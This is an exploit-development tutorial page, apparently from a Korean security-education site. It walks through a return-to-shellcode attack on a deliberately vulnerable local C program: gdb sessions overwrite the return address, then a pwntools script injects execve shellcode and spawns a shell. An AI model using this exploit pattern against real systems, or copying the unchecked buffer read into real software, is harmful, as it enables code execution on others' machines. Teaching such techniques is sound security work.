<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

Excuse the ads! We need some help to keep our site up.

<div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'ko', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, multilanguagePage: true, gaTrack: true, gaId: 'UA-92563911-1'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

List

Return to Shellcode

CALL & RET instruction

InstructionProcessing(?)
Call <Operation>

PUSH ReturnAddress

JMP <Operation>

ret

POP RIP

JMP RIP

Proof of concept

#include <stdio.h>
#include <unistd.h>

void vuln(){
}

void main(){
	vuln();
}
lazenca0x0@ubuntu:~/Exploit$ gcc -fno-stack-protector -o test test.c 
lazenca0x0@ubuntu:~/Exploit$ gdb -q ./test
Reading symbols from ./test...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x00000000004004dd <+0>:	push   rbp
   0x00000000004004de <+1>:	mov    rbp,rsp
   0x00000000004004e1 <+4>:	mov    eax,0x0
   0x00000000004004e6 <+9>:	call   0x4004d6 <vuln>
   0x00000000004004eb <+14>:	nop
   0x00000000004004ec <+15>:	pop    rbp
   0x00000000004004ed <+16>:	ret    
End of assembler dump.
gdb-peda$ b *0x00000000004004e6
Breakpoint 1 at 0x4004e6

gdb-peda$ disassemble vuln 
Dump of assembler code for function vuln:
   0x00000000004004d6 <+0>:	push   rbp
   0x00000000004004d7 <+1>:	mov    rbp,rsp
   0x00000000004004da <+4>:	nop
   0x00000000004004db <+5>:	pop    rbp
   0x00000000004004dc <+6>:	ret    
End of assembler dump.
gdb-peda$ b *0x00000000004004d6
Breakpoint 2 at 0x4004d6

gdb-peda$ b *0x00000000004004dc
Breakpoint 3 at 0x4004dc
gdb-peda$ 
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/test
Breakpoint 1, 0x00000000004004e6 in main ()
gdb-peda$ i r rsp
rsp            0x7fffffffe4b0	0x7fffffffe4b0
gdb-peda$ x/gx 0x7fffffffe4b0
0x7fffffffe4b0:	0x00000000004004f0
gdb-peda$ c
Continuing.

Breakpoint 2, 0x00000000004004d6 in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe4a8	0x7fffffffe4a8
gdb-peda$ x/gx 0x7fffffffe4a8
0x7fffffffe4a8:	0x00000000004004eb
gdb-peda$ 
Breakpoint 3, 0x00000000004004dc in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe4a8	0x7fffffffe4a8
gdb-peda$ x/gx 0x7fffffffe4a8
0x7fffffffe4a8:	0x00000000004004eb
gdb-peda$ ni
0x00000000004004eb in main ()
gdb-peda$ i r rip
rip            0x4004eb	0x4004eb <main+14>
gdb-peda$ i r rsp
rsp            0x7fffffffe4b0	0x7fffffffe4b0
gdb-peda$ x/gx 0x7fffffffe4b0
0x7fffffffe4b0:	0x00000000004004f0
gdb-peda$
Breakpoint 3, 0x00000000004004dc in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe488	0x7fffffffe488
gdb-peda$ x/gx 0x7fffffffe488
0x7fffffffe488:	0x00000000004004eb
gdb-peda$ set *0x7fffffffe488 = 0x4004d6
gdb-peda$ x/gx 0x7fffffffe488
0x7fffffffe488:	0x00000000004004d6
gdb-peda$ ni
0x00000000004004d6 in vuln ()
gdb-peda$ i r rip
rip            0x4004d6	0x4004d6 <vuln>
gdb-peda$ 

Permissions in memory

00400000-00401000 r-xp 00000000 08:01 925169                             /home/lazenca0x0/Exploit/shellcode/test
00600000-00601000 r--p 00000000 08:01 925169                             /home/lazenca0x0/Exploit/shellcode/test
00601000-00602000 rw-p 00001000 08:01 925169                             /home/lazenca0x0/Exploit/shellcode/test
7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dcd000-7ffff7dd1000 r--p 001c0000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd1000-7ffff7dd3000 rw-p 001c4000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 
7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 1975089                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7fdd000-7ffff7fe0000 rw-p 00000000 00:00 0 
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0                          [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 1975089                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 1975089                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
00400000-00401000 r-xp 00000000 08:01 925169                             /home/lazenca0x0/Exploit/shellcode/test
00600000-00601000 r-xp 00000000 08:01 925169                             /home/lazenca0x0/Exploit/shellcode/test
00601000-00602000 rwxp 00001000 08:01 925169                             /home/lazenca0x0/Exploit/shellcode/test
7ffff7a0d000-7ffff7bcd000 r-xp 00000000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7bcd000-7ffff7dcd000 ---p 001c0000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dcd000-7ffff7dd1000 r-xp 001c0000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd1000-7ffff7dd3000 rwxp 001c4000 08:01 1975091                    /lib/x86_64-linux-gnu/libc-2.23.so
7ffff7dd3000-7ffff7dd7000 rwxp 00000000 00:00 0 
7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 1975089                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7fdd000-7ffff7fe0000 rwxp 00000000 00:00 0 
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0                          [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r-xp 00025000 08:01 1975089                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7ffd000-7ffff7ffe000 rwxp 00026000 08:01 1975089                    /lib/x86_64-linux-gnu/ld-2.23.so
7ffff7ffe000-7ffff7fff000 rwxp 00000000 00:00 0 
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

Proof of concept

#include <stdio.h>
#include <unistd.h>

void vuln(){
    char buf[50];
    printf("buf[50] address : %p\n",buf);
    read(0, buf, 100);
}

void main(){
    vuln();
}
lazenca0x0@ubuntu:~/Exploit/shellcode$ gcc -z execstack -fno-stack-protector -o poc poc.c 
lazenca0x0@ubuntu:~/Exploit/shellcode$ gdb -q ./poc
Reading symbols from ./poc...(no debugging symbols found)...done.
gdb-peda$ disassemble vuln 
Dump of assembler code for function vuln:
   0x0000000000400566 <+0>:	push   rbp
   0x0000000000400567 <+1>:	mov    rbp,rsp
   0x000000000040056a <+4>:	sub    rsp,0x40
   0x000000000040056e <+8>:	lea    rax,[rbp-0x40]
   0x0000000000400572 <+12>:	mov    rsi,rax
   0x0000000000400575 <+15>:	mov    edi,0x400634
   0x000000000040057a <+20>:	mov    eax,0x0
   0x000000000040057f <+25>:	call   0x400430 <printf@plt>
   0x0000000000400584 <+30>:	lea    rax,[rbp-0x40]
   0x0000000000400588 <+34>:	mov    edx,0x64
   0x000000000040058d <+39>:	mov    rsi,rax
   0x0000000000400590 <+42>:	mov    edi,0x0
   0x0000000000400595 <+47>:	call   0x400440 <read@plt>
   0x000000000040059a <+52>:	nop
   0x000000000040059b <+53>:	leave  
   0x000000000040059c <+54>:	ret    
End of assembler dump.
gdb-peda$ b *0x400566
Breakpoint 1 at 0x400566
gdb-peda$ b *0x400595
Breakpoint 2 at 0x400595
gdb-peda$ b *0x40059c
Breakpoint 3 at 0x40059c
gdb-peda$ 
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/shellcode/poc 

Breakpoint 1, 0x0000000000400566 in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe448	0x7fffffffe448
gdb-peda$ x/gx 0x7fffffffe448
0x7fffffffe448:	0x00000000004005ab
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x000000000040059d <+0>:	push   rbp
   0x000000000040059e <+1>:	mov    rbp,rsp
   0x00000000004005a1 <+4>:	mov    eax,0x0
   0x00000000004005a6 <+9>:	call   0x400566 <vuln>
   0x00000000004005ab <+14>:	nop
   0x00000000004005ac <+15>:	pop    rbp
   0x00000000004005ad <+16>:	ret    
End of assembler dump.
gdb-peda$ 
gdb-peda$ c
Continuing.
buf[50] address : 0x7fffffffe400

Breakpoint 2, 0x0000000000400595 in vuln ()
gdb-peda$ i r rsi
rsi            0x7fffffffe400	0x7fffffffe400
gdb-peda$ p/d 0x7fffffffe448 - 0x7fffffffe400
$1 = 72
gdb-peda$ ni
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKK
gdb-peda$ x/10gx 0x7fffffffe400
0x7fffffffe400:	0x4141414141414141	0x4242424242424242
0x7fffffffe410:	0x4343434343434343	0x4444444444444444
0x7fffffffe420:	0x4545454545454545	0x4646464646464646
0x7fffffffe430:	0x4747474747474747	0x4848484848484848
0x7fffffffe440:	0x4949494949494949	0x4a4a4a4a4a4a4a4a
gdb-peda$ 
Breakpoint 3, 0x000000000040059c in vuln ()
gdb-peda$ x/gx 0x7fffffffe448
0x7fffffffe448:	0x4a4a4a4a4a4a4a4a
gdb-peda$ x/s 0x7fffffffe448
0x7fffffffe448:	"JJJJJJJJKKKKKKKK\nآ\367\377\177"
gdb-peda$ 

Exploit

from pwn import *

p = process('./poc')
p.recvuntil('buf[50] address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)

exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
exploit += "\x90" * (72 - len(exploit))
exploit += p64(stackAddr)
p.send(exploit)
p.interactive()
lazenca0x0@ubuntu:~/Exploit/shellcode$ python exploit.py 
[+] Starting local process './test': pid 111702
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

Protection

Related site

Comments

<div class="fb-comments" data-href="https://www.lazenca.net/display/TEC/02.Return+to+Shellcode" data-width="*" data-numposts="5"></div>
<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>